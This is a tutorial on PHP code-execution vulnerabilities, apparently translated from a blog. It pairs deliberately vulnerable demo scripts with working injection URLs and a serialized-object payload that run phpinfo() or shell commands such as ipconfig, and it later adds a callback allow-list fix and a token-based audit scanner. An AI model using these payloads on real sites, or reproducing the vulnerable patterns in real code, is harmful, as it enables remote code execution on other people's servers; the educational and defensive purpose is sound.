PHP Code Execution Vulnerability Summary

A feast for PHP security enthusiasts: the Month of PHP Security. I read a lot of PHP security articles and shared them; their authors are all idols.

From: http://hi.baidu.com/menzhi007
1. Code execution functions

Functions and operators that can execute code or commands in PHP, such as eval(), assert(), the backtick operator (`...`), system(), exec(), shell_exec(), passthru(), escapeshellcmd(), pcntl_exec(), etc.

DEMO code 1.1:

<?php
// the backtick operator runs its contents as a shell command and returns the output
echo `dir`;
?>
2. File inclusion code injection

Code injection through the file-inclusion functions include(), include_once(), require() and require_once() under specific conditions.

When allow_url_include = On and the PHP version is >= 5.2.0 (the data: stream wrapper is available from 5.2.0), code injection occurs.

DEMO code 2.1:

<?php
// the included path comes straight from the request
include($_GET['a']);
?>

Accessing http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E

runs phpinfo().
3. Regular expression matching code injection

Code injection caused by the well-known preg_replace() function: when the /e pattern modifier is present in the pattern, the replacement string is evaluated as PHP code. We discuss this in three cases.

3.1 preg_replace() pattern parameter injection

Code injection through the first parameter, pattern.

When magic_quotes_gpc = Off, the code is executed.

DEMO code 3.1:

<?php
// the tail of the pattern, including any modifiers, comes from the request
echo $regexp = $_GET['reg'];

$var = '<php>phpinfo()</php>';

preg_replace("/<php>(.*?)$regexp", '\1', $var);
?>

Accessing http://127.0.0.1/preg_replace1.php?reg=%3C\/php%3E/e (the injected tail closes the pattern and appends the /e modifier)

runs phpinfo().

3.2 preg_replace() replacement parameter injection

Code injection through the second parameter, replacement, resulting in code execution.

DEMO code 3.2:

<?php
// with /e the replacement is evaluated as PHP code, and here it comes from the request
preg_replace("/menzhi007/e", $_GET['h'], "just test");
?>

When we submit http://127.0.0.1/preg_replace2.php?h=phpinfo()

phpinfo() runs.

3.3 preg_replace() subject parameter injection

We construct the third parameter, subject, to execute code. Submitting http://127.0.0.1/preg_replace3.php?h=[php]phpinfo()[/php]

or http://127.0.0.1/preg_replace3.php?h=[php]${phpinfo%28%29}[/php] causes code execution.

DEMO code 3.3:

<?php
// the replacement '\1' is a backreference to text captured from the request,
// and /e evaluates that text as PHP code
preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", '\1', $_GET['h']);
?>
4. Dynamic Code Execution

4.1 Dynamic variable code execution

DEMO code 4.1:

<?php
// both the function name and its argument come from the request
$dyn_func = $_GET['dyn_func'];

$argument = $_GET['argument'];

// a string held in a variable is called as a function
$dyn_func($argument);
?>

We submit http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig to execute the ipconfig command.

4.2 Dynamic function code execution

DEMO code 4.2:

<?php
$foobar = $_GET['foobar'];

// the request value is interpolated into the body of the generated function
$dyn_func = create_function('$foobar', "echo $foobar;");

$dyn_func('');
?>

We submit http://127.0.0.1/create_function.php?foobar=system%28dir%29 to run the dir command.
5. Others

5.1 Code execution through the ob_start() function

DEMO code 5.1:

<?php
$foobar = 'system';

// the output callback receives the buffered output as its argument
ob_start($foobar);

echo 'dir';

// flushing the buffer calls system('dir')
ob_end_flush();
?>

5.2 Code execution through the array_map() function

DEMO code 5.2:

<?php
// the callback name comes from the request
$evil_callback = $_GET['callback'];

$some_array = array(0, 1, 2, 3);

// array_map() calls the named function once per element
$new_array = array_map($evil_callback, $some_array);
?>

We submit http://127.0.0.1/array_map.php?callback=phpinfo to execute phpinfo().
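The dynamic-function demos in 4.1 and 4.2 and the array_map() demo in 5.2 are the same bug: a string from the request is used as a callable. The following is an added example, not code from the original article, hardening both the same way: the request chooses an operation by name, but the name is only a key into a fixed map and is never passed to PHP as a callable. The operation names in the map are assumptions for the demo. create_function() itself was deprecated in PHP 7.2 and removed in PHP 8.0; a closure is its replacement, and it never interpolates request data into code.

```php
<?php
// Added example (not from the original article): request-selected callbacks
// resolved through an allow-list. The operation names are assumptions.

const ALLOWED_OPERATIONS = [
    'abs'    => 'abs',
    'square' => 'square',
    'sqrt'   => 'sqrt',
];

function square(int $n): int
{
    return $n * $n;
}

// Returns the callable behind a request-supplied name, or null when the name
// is not in the map ("system", "phpinfo", "assert" and friends simply do not
// exist here, so there is nothing to escape or filter).
function lookup_operation(?string $name): ?callable
{
    if ($name === null || !array_key_exists($name, ALLOWED_OPERATIONS)) {
        return null;
    }
    return ALLOWED_OPERATIONS[$name];
}

$op = lookup_operation($_GET['callback'] ?? null);
if ($op === null) {
    http_response_code(400);
    exit('unknown operation');
}

$some_array = [0, 1, 2, 3];
$new_array = array_map($op, $some_array);
var_dump($new_array);
```

Checking `is_callable()` or `function_exists()` on the request value is not a substitute for the map: `system` and `phpinfo` pass both checks. The map makes the set of reachable functions explicit and reviewable.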

5.3 unserialize() and eval()

unserialize() is a heavily used PHP function. Improper use of unserialize() may cause security risks.

(See Heige's challenge 2: http://hi.baidu.com/hi_heige/blo... 5b18f499250a9b.html)

DEMO code 5.3:

<?php
class Example {

    var $var = '';

    // the destructor runs when the object is released, so unserialize()
    // itself is enough to reach the eval()
    function __destruct() {
        eval($this->var);
    }
}

// the serialized payload, and therefore the class and its properties, comes from the request
unserialize($_GET['saved_code']);
?>

We submit http://127.0.0.1/unserialize.php?saved_code=O:7:%22example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;}
to execute phpinfo().

5.4 Functions that may easily cause security problems

There are many functions of the same type (they take a callback or handler name that, if it comes from the request, is called as code):

array_map()

usort(), uasort(), uksort()

array_filter()

array_reduce()

array_diff_uassoc(), array_diff_ukey()

array_udiff(), array_udiff_assoc(), array_udiff_uassoc()

array_intersect_assoc(), array_intersect_uassoc()

array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()

array_walk(), array_walk_recursive()

xml_set_character_data_handler()

xml_set_default_handler()

xml_set_element_handler()

xml_set_end_namespace_decl_handler()

xml_set_external_entity_ref_handler()

xml_set_notation_decl_handler()

xml_set_processing_instruction_handler()

xml_set_start_namespace_decl_handler()

xml_set_unparsed_entity_decl_handler()

stream_filter_register()

set_error_handler()

register_shutdown_function()

register_tick_function()
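A list this long is more useful as an audit rule than as something to remember. The following is an added example, not code from the original article: a small token-based scanner, built on PHP's own token_get_all(), that reports eval() and the backtick operator, preg_replace() calls whose pattern is not a literal or carries the /e modifier, and calls to the callback-taking functions above whose callback argument is neither a string literal nor an inline closure. The callback-argument positions are taken from the PHP manual for the functions covered; the sample source at the bottom is constructed for the demo. It is a heuristic for review, not a proof of absence: a literal callback name is reported as safe even though the function it names may still be dangerous.

```php
<?php
// Added example (not from the original article): token-based audit for the
// code-execution sinks discussed on this page. Heuristic, for manual review.

// Callback-taking functions and the 0-based index of their callback argument.
const CALLBACK_SINKS = [
    'array_map' => 0, 'ob_start' => 0, 'set_error_handler' => 0,
    'register_shutdown_function' => 0, 'register_tick_function' => 0,
    'call_user_func' => 0, 'call_user_func_array' => 0,
    'usort' => 1, 'uasort' => 1, 'uksort' => 1, 'array_filter' => 1,
    'array_reduce' => 1, 'array_walk' => 1, 'array_walk_recursive' => 1,
];

// Text of a token, whether token_get_all() returned it as an array or a string.
function tok_text($t): string
{
    return is_array($t) ? $t[1] : $t;
}

// Split the tokens between a call's parentheses into one token list per argument.
function split_arguments(array $tokens, int $open): array
{
    $args = [[]];
    $depth = 0;
    for ($i = $open, $n = count($tokens); $i < $n; $i++) {
        $t = $tokens[$i];
        $text = tok_text($t);
        if ($text === '(' || $text === '[' || $text === '{') {
            if (++$depth === 1) continue;            // the call's own opening paren
        } elseif ($text === ')' || $text === ']' || $text === '}') {
            if (--$depth === 0) break;               // end of the argument list
        } elseif ($text === ',' && $depth === 1) {
            $args[] = [];
            continue;
        }
        if (is_array($t) && $t[0] === T_WHITESPACE) continue;
        $args[count($args) - 1][] = $t;
    }
    return $args;
}

function audit_source(string $code, string $file = 'sample.php'): array
{
    $findings = [];
    $inShell = false;
    $tokens = token_get_all($code);
    foreach ($tokens as $i => $t) {
        if ($t === '`') {                            // backtick operator, reported once per pair
            if (!$inShell) $findings[] = "$file: backtick (shell) operator";
            $inShell = !$inShell;
            continue;
        }
        if (!is_array($t)) continue;
        [$id, $text, $line] = $t;
        if ($id === T_EVAL) { $findings[] = "$file:$line: eval()"; continue; }
        if ($id !== T_STRING) continue;
        // Skip method names, static calls and function definitions.
        $k = $i - 1;
        while ($k >= 0 && is_array($tokens[$k]) && $tokens[$k][0] === T_WHITESPACE) $k--;
        if ($k >= 0 && is_array($tokens[$k])
            && in_array($tokens[$k][0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION], true)) continue;
        // The name must be followed by "(" to be a call.
        $j = $i + 1;
        while (isset($tokens[$j]) && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) $j++;
        if (!isset($tokens[$j]) || $tokens[$j] !== '(') continue;
        $name = strtolower($text);
        $args = split_arguments($tokens, $j);
        if ($name === 'preg_replace') {
            $p = $args[0] ?? [];
            if (count($p) !== 1 || !is_array($p[0]) || $p[0][0] !== T_CONSTANT_ENCAPSED_STRING) {
                $findings[] = "$file:$line: preg_replace() pattern is not a literal";
            } elseif (preg_match('~[^a-zA-Z0-9\s\\\\][a-zA-Z]*e[a-zA-Z]*[\'"]$~', $p[0][1])) {
                $findings[] = "$file:$line: preg_replace() pattern uses the /e modifier";
            }
            continue;
        }
        if (!isset(CALLBACK_SINKS[$name])) continue;
        $arg = $args[CALLBACK_SINKS[$name]] ?? [];
        if ($arg === []) continue;                   // callback argument not supplied
        $head = is_array($arg[0]) ? $arg[0][0] : null;
        $literal = count($arg) === 1 && $head === T_CONSTANT_ENCAPSED_STRING;
        $closure = $head === T_FUNCTION || $head === T_STATIC || (defined('T_FN') && $head === T_FN);
        if (!$literal && !$closure) {
            $findings[] = "$file:$line: $name() callback is not a literal: " . implode('', array_map('tok_text', $arg));
        }
    }
    return $findings;
}

// Constructed sample mixing the patterns from this page with safe variants.
$sample = <<<'PHP'
<?php
$cb = $_GET['callback'];
$out = array_map($cb, [1, 2, 3]);
$ok = array_map('intval', ['1', '2']);
usort($rows, function ($a, $b) { return $a <=> $b; });
preg_replace("/menzhi007/e", $_GET['h'], "just test");
ob_start($handler);
echo `dir`;
PHP;

foreach (audit_source($sample) as $finding) {
    echo $finding, PHP_EOL;
}
```

On the constructed sample it reports the array_map() call on line 3, the /e pattern on line 6, the ob_start() handler on line 7 and the backtick, and stays quiet on the literal `'intval'` and the closure passed to usort(). Pointing it at a source tree (`token_get_all(file_get_contents($path))` per file) gives a first list of places to read by hand; the bracket tracking does not understand `${...}` string interpolation, so a finding is a prompt for review rather than a verdict.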
